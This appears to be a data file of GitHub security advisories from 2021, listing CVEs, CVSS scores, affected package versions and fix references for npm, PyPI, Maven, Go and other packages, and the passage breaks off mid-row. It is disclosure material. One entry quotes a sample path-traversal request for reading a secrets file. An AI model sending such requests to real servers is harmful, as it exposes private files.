+1.4.0,GHSA-vxr4-rxw7-g7v6,2023-09-11T16:21:17Z,2021-12-16T14:30:56Z,,['CVE-2021-23561'],Prototype Pollution in comb,All versions of package comb are vulnerable to Prototype Pollution via the `deepMerge()` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'comb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23561'}, {'type': 'PACKAGE', 'url': 'https://github.com/C2FO/comb'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-COMB-1730083'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:30:03Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-ggmr-44cv-24pm,2021-12-08T23:14:41Z,2021-12-09T18:35:22Z,,['CVE-2021-43811'],Code injection via unsafe YAML loading,"### Impact +Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. + +An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. + +### Patches +The issue is fixed in version 2.3.24 and above by #964. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [awslabs/sockeye](https://github.com/awslabs/sockeye) +* Email us at [sockeye-dev](mailto:sockeye-dev@amazon.com) + +### Attribution +This vulnerability was reported by Masatoshi Yoshizawa of yamory Security Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sockeye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43811'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/sockeye/pull/964'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/sockeye'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/sockeye/releases/tag/2.3.24'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T23:14:41Z', 'nvd_published_at': '2021-12-08T23:15:00Z'}" +1.4.0,GHSA-vj54-cjrx-x696,2023-09-29T17:24:54Z,2021-12-09T19:59:24Z,,['CVE-2020-11576'],Observable Discrepancy in Argo,"Fixed in v1.5.1, Argo version v1.5.0 was vulnerable to a user-enumeration vulnerability which allowed attackers to determine the usernames of valid (non-SSO) accounts because /api/v1/session returned 401 for an existing username and 404 otherwise. + +### Specific Go Packages Affected +github.com/argoproj/argo-cd/util/session +github.com/argoproj/argo-cd/server/session","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}], 'versions': ['1.5.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11576'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/3215'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/35a7350b7444bcaf53ee0bb11b9d8e3ae4b717a1'}, {'type': 'WEB', 'url': 'https://www.soluble.ai/blog/argo-cves-2020'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T18:19:26Z', 'nvd_published_at': '2020-04-08T18:15:00Z'}" +1.4.0,GHSA-89qr-369f-5m5x,2023-09-14T16:08:36Z,2021-12-09T19:15:46Z,,['CVE-2020-36182'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36182'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/3004'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:37:58Z', 'nvd_published_at': '2021-01-07T00:15:00Z'}" +1.4.0,GHSA-3p85-p4qg-hcrp,2021-12-14T15:06:00Z,2021-12-16T14:27:58Z,,['CVE-2021-4081'],pimcore is vulnerable to Cross-site Scripting,pimcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4081'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/34ed0e050ff679b4b38414aef48ea1ff956f907a'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/da173e66-76ba-4f98-b8fb-429aabf222d3'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:06:00Z', 'nvd_published_at': '2021-12-10T11:15:00Z'}" +1.4.0,GHSA-97cc-825c-399g,2021-12-09T18:07:18Z,2021-12-10T20:33:29Z,,['CVE-2021-4050'],Cross site scripting in remdex/livehelperchat,livehelperchat is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'remdex/livehelperchat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4050'}, {'type': 'WEB', 'url': 'https://github.com/livehelperchat/livehelperchat/commit/0ce1dd2a13509747c240c8484228a5df8d6e03ec'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/27eb39d7-7636-4c4b-922c-a2f8fbe1ba05'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T18:07:18Z', 'nvd_published_at': '2021-12-08T11:15:00Z'}" +1.4.0,GHSA-6w7g-p4jh-rf92,2023-01-20T22:03:21Z,2021-12-20T18:24:43Z,,['CVE-2020-13846'],"""Verify All"" Returns Success Despite Validation Failures in Singularity","### Impact + +The `--all / -a` option to `singularity verify` returns success even when some objects in a SIF container are not signed, or cannot be verified. + +The SIF objects that are not verified are reported in `WARNING` log messages, but a `Container Verified` message and exit code of `0` are returned. + +Workflows that verify a container using `--all / -a` and use the exit code as an indicator of success are vulnerable to running SIF containers that have unsigned, or modified, objects that may be exploited to introduce malicious behavior. + +``` +$ singularity verify -a image.sif +WARNING: Missing signature for SIF descriptor 2 (JSON.Generic) +WARNING: Missing signature for SIF descriptor 3 (FS) +Container is signed by 1 key(s): + +Verifying partition: Def.FILE: +12045C8C0B1004D058DE4BEDA20C27EE7FF7BA84 +[LOCAL] Unit Test +[OK] Data integrity verified + +INFO: Container verified: image.sif + +$ echo $? +0 +``` + + +### Patches + +Singularity 3.6.0 has a new implementation of sign/verify that fixes this issue. + +All users are advised to upgrade to 3.6.0. Note that Singularity 3.6.0 uses a new signature format that is necessarily incompatible with Singularity < 3.6.0 - e.g. Singularity 3.5.3 cannot verify containers signed by 3.6.0. + +Version 3.6.0 includes a `--legacy-insecure` flag for the `singularity verify` command, that will perform verification of the older, and insecure, legacy signatures for compatibility with existing containers. This does not guarantee that containers have not been modified since signing, due to other issues in the legacy signature format. + +### Workarounds + +If you are unable to update to 3.6.0 ensure that you do not rely on the return code of `singularity verify --all / -a` as an indicator of trust in a container. + +Note that other issues in the sign/verify implementation in Singularity < 3.6.0 allow additional means to introduce malicious behavior to a signed container. + + +### For more information + +General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the: + +* [Singularity Slack Channel](https://bit.ly/2m0g3lX) +* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-6w7g-p4jh-rf92'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13846'}, {'type': 'PACKAGE', 'url': 'https://github.com/sylabs/singularity'}, {'type': 'WEB', 'url': 'https://medium.com/sylabs'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00046.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00059.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00053.html'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T19:12:04Z', 'nvd_published_at': '2020-07-14T18:15:00Z'}" +1.4.0,GHSA-792j-9wj3-j634,2023-09-07T18:46:54Z,2021-12-10T20:30:52Z,,['CVE-2021-44684'],Command injection in github-todos,"naholyr github-todos 3.1.0 is vulnerable to command injection. The range argument for the _hook subcommand is concatenated without any validation, and is directly used by the exec function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'github-todos'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44684'}, {'type': 'WEB', 'url': 'https://github.com/dwisiswant0/advisory/issues/5'}, {'type': 'WEB', 'url': 'https://advisory.dw1.io/5'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T20:28:47Z', 'nvd_published_at': '2021-12-07T00:15:00Z'}" +1.4.0,GHSA-xmgj-5fh3-xjmm,2021-12-17T19:34:45Z,2021-12-17T19:59:13Z,,['CVE-2021-43840'],Path traversal when MessageBus::Diagnostics is enabled,"### Impact + +Users who deployed message bus with diagnostics features enabled (default off) were vulnerable to a path traversal bug, which could lead to disclosure of secret information on a machine if an unintended user were to gain access to the diagnostic route. The impact is also greater if there is no proxy for your web application as the number of steps up the directories is not bounded. For deployments which uses a proxy, the impact varies. For example, If a request goes through a proxy like Nginx with `merge_slashes` enabled, the number of steps up the directories that can be read is limited to 3 levels. + +### Patches + +Patched in 3.3.7. + +### Workarounds + +Disable MessageBus::Diagnostics in production like environments. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'message_bus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/discourse/message_bus/security/advisories/GHSA-xmgj-5fh3-xjmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43840'}, {'type': 'WEB', 'url': 'https://github.com/discourse/message_bus/commit/9b6deee01ed474c7e9b5ff65a06bb0447b4db2ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/discourse/message_bus'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/message_bus/CVE-2021-43840.yml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:34:45Z', 'nvd_published_at': '2021-12-17T19:15:00Z'}" +1.4.0,GHSA-mh9j-v6mq-pfch,2022-03-18T15:08:03Z,2021-12-04T00:00:53Z,,['CVE-2021-43676'],Path manipulation in matyhtf/framework,matyhtf framework v3.0.5 is affected by a path manipulation vulnerability in Smarty.class.php. The issue was fixed in version 3.0.6.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'matyhtf/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43676'}, {'type': 'WEB', 'url': 'https://github.com/matyhtf/framework/issues/206'}, {'type': 'WEB', 'url': 'https://github.com/matyhtf/framework/commit/25084603b7ea771eebe263d39744fe6abf1f8d61'}, {'type': 'PACKAGE', 'url': 'https://github.com/matyhtf/framework'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2022-03-02T21:51:34Z', 'nvd_published_at': '2021-12-03T14:15:00Z'}" +1.4.0,GHSA-8w26-6f25-cm9x,2023-09-14T15:52:47Z,2021-12-09T19:16:02Z,,['CVE-2020-36185'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36185'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2998'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:37:42Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-8fp4-rp6c-5gcv,2021-12-02T21:28:29Z,2021-12-02T22:25:54Z,,['CVE-2021-43795'],Path Traversal in com.linecorp.armeria:armeria,"### Impact + +An attacker can access an Armeria server's local file system beyond its restricted directory by sending an HTTP request whose path contains `%2F` (encoded `/`), such as `/files/..%2Fsecrets.txt`, bypassing Armeria's path validation logic. + +### Patches + +Armeria 1.13.4 or above contains the hardened path validation logic that handles `%2F` properly. + +### Workarounds + +This vulnerability can be worked around by inserting a decorator that performs an additional validation on the request path, e.g. + +```java +Server + .builder() + .serviceUnder( + ""/files"", + FileService + .of(...) + .decorate((delegate, ctx, req) -> { + String path = req.headers().path(); + if (path.contains(""%2f"") || path.contains(""%2F"")) { + return HttpResponse.of(HttpStatus.BAD_REQUEST); + } + return delegate.serve(ctx, req); + }) + ) + .build() +``` + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [line/armeria](https://github.com/line/armeria) +* Chat with us at [Slack](https://armeria.dev/s/slack) + +### Credits + +This vulnerability was originally reported by Abdallah Zaher ([elcayser-0x0a](https://hackerone.com/elcayser-0x0a?type=user)).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.linecorp.armeria:armeria'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.13.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/line/armeria/security/advisories/GHSA-8fp4-rp6c-5gcv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43795'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/pull/3855'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/e2697a575e9df6692b423e02d731f293c1313284'}, {'type': 'PACKAGE', 'url': 'https://github.com/line/armeria'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:28:29Z', 'nvd_published_at': '2021-12-02T18:15:00Z'}" +1.4.0,GHSA-g54h-m393-cpwq,2021-05-24T20:46:53Z,2021-12-20T18:21:54Z,,[],devices resource list treated as a blacklist by default,"### Impact +Contrary to the [OCI runtime specification](https://github.com/opencontainers/runtime-spec/blob/v1.0.2/config-linux.md#device-whitelist), `runc`'s implementation of the `linux.resources.devices` list was a black-list by default. This means that users who created their own `config.json` objects and didn't prefix a deny-all rule (`{""allow"": false, ""permissions"": ""rwm""}` or equivalent) were not provided protection by the `devices` cgroup. This would allow malicious containers (with sufficient privileges) to create arbitrary device inodes (assuming they have `CAP_MKNOD`) and operate on any device inodes they may have access to (assuming they have regular Unix DAC permissions). + +However, most (if not all) programs that make use of `runc` include this deny-all rule. This was most likely added before the specification mandated a white-list of devices, and the fact that all programs wrote their own deny-all rule obscured the existence of this bug for several years. In fact, even the specification's examples include a default deny-all rule! We therefore believe that while this is a security bug (and has been fixed as such), it was almost certainly not exploitable in the wild due to the inclusion of default deny-all rules by all known users of `runc` -- hence why this advisory has low severity. + +### Patches +This issue has been fixed in [a patch that was part of a larger rework of the devices cgroup code in runc](https://github.com/opencontainers/runc/pull/2391) -- which lead to the discovery of this security bug. Users should upgrade to 1.0.0-rc91 as soon as it is released, or wait for your distribution to backport the relevant fixes. + +### Workarounds +If you are using `runc` directly, ensure that there is a deny-all entry at the beginning of `linux.resources.devices` -- such an entry would look like `{""allow"": false, ""permissions"": ""rwm""}` (all other fields are ignored, though `type` must be set to `""a""` or `null` if it is present). + +Users which consume `runc` through another program should check whether their containers are operating under a white-list -- this can be done by reading `/sys/fs/cgroup/devices/devices.list` inside the container. If the file contains only the entry `a *:* rwm` (meaning the cgroup is in black-list mode, which likely means ""allow all device access"") then your containers are vulnerable to this issue. + +As always, we recommend **in the strongest possible terms** that all of our users enable user namespaces on all of their workloads (or pressure their vendors to do so). User namespaces are one of the most significant defense-in-depth protections you can enable for containers, and have prevented many container-related vulnerabilities (both kernel 0days as well as bugs in container runtimes, such as this one). + +### References +* https://www.kernel.org/doc/html/latest/admin-guide/cgroup-v1/devices.html +* [opencontainers/runtime-spec/config-linux.md#device-whitelist](https://github.com/opencontainers/runtime-spec/blob/v1.0.2/config-linux.md#device-whitelist) +* https://github.com/opencontainers/runc/pull/2391 + +### For more information +If you have any questions or comments about this advisory: +* [Open an issue in this repo](https://github.com/opencontainers/runc/issues/new). +* Email us at .",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc91'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc90'}}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/security/advisories/GHSA-g54h-m393-cpwq'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T20:46:53Z', 'nvd_published_at': None}" +1.4.0,GHSA-7hpj-hfcr-5qwm,2021-12-06T18:13:11Z,2021-12-06T18:17:38Z,,['CVE-2019-14867'],Code injection in FreeIPA,"A flaw was found in IPA, all 4.6.x versions before 4.6.7, all 4.7.x versions before 4.7.4 and all 4.8.x versions before 4.8.3, in the way the internal function ber_scanf() was used in some components of the IPA server, which parsed kerberos key data. An unauthenticated attacker who could trigger parsing of the krb principal key could cause the IPA server to crash or in some conditions, cause arbitrary code to be executed on the server hosting the IPA server.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ipa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.2'}, {'fixed': '4.6.7'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ipa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.7.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ipa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.8.0'}, {'fixed': '4.8.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14867'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHBA-2019:4268'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0378'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14867'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/tree/main/vulns/ipa/PYSEC-2019-28.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/67SEUWJAJ5RMH5K4Q6TS2I7HIMXUGNKF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLFL5XDCJ3WT6JCLCQVKHZBLHGW7PW4T/'}, {'type': 'WEB', 'url': 'https://www.freeipa.org/page/Releases/4.6.7'}, {'type': 'WEB', 'url': 'https://www.freeipa.org/page/Releases/4.7.4'}, {'type': 'WEB', 'url': 'https://www.freeipa.org/page/Releases/4.8.3'}]","{'cwe_ids': ['CWE-400', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T18:13:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-7fm6-gxqg-2pwr,2021-07-13T19:51:48Z,2021-12-10T17:26:06Z,,['CVE-2021-23389'],Code Injection in total.js,The package total.js before 3.4.9 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23389'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/blob/master/utils.js%23L6606-L6631'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTALJS-1088607'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T19:51:48Z', 'nvd_published_at': '2021-07-12T16:15:00Z'}" +1.4.0,GHSA-fpfv-jqm9-f5jm,2022-06-21T20:12:53Z,2021-12-18T00:00:41Z,,['CVE-2021-34141'],Incorrect Comparison in NumPy,"Incomplete string comparison in the numpy.core component in NumPy1.9.x, which allows attackers to fail the APIs via constructing specific string objects.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'numpy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34141'}, {'type': 'WEB', 'url': 'https://github.com/numpy/numpy/issues/18993'}, {'type': 'WEB', 'url': 'https://github.com/numpy/numpy/issues/18993#issuecomment-1010735102'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-fpfv-jqm9-f5jm'}, {'type': 'PACKAGE', 'url': 'https://github.com/numpy/numpy'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/numpy/PYSEC-2021-855.yaml'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-697'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-06-21T20:12:53Z', 'nvd_published_at': '2021-12-17T19:15:00Z'}" +1.4.0,GHSA-55x5-fj6c-h6m8,2022-08-11T20:41:28Z,2021-12-13T18:14:36Z,,['CVE-2021-43818'],lxml's HTML Cleaner allows crafted and SVG embedded scripts to pass through,"### Impact +The HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. + +Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5. + +### Patches +The issue has been resolved in lxml 4.6.5. + +### Workarounds +None. + +### References +The issues are tracked under the report IDs GHSL-2021-1037 and GHSL-2021-1038. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'lxml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lxml/lxml/security/advisories/GHSA-55x5-fj6c-h6m8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43818'}, {'type': 'WEB', 'url': 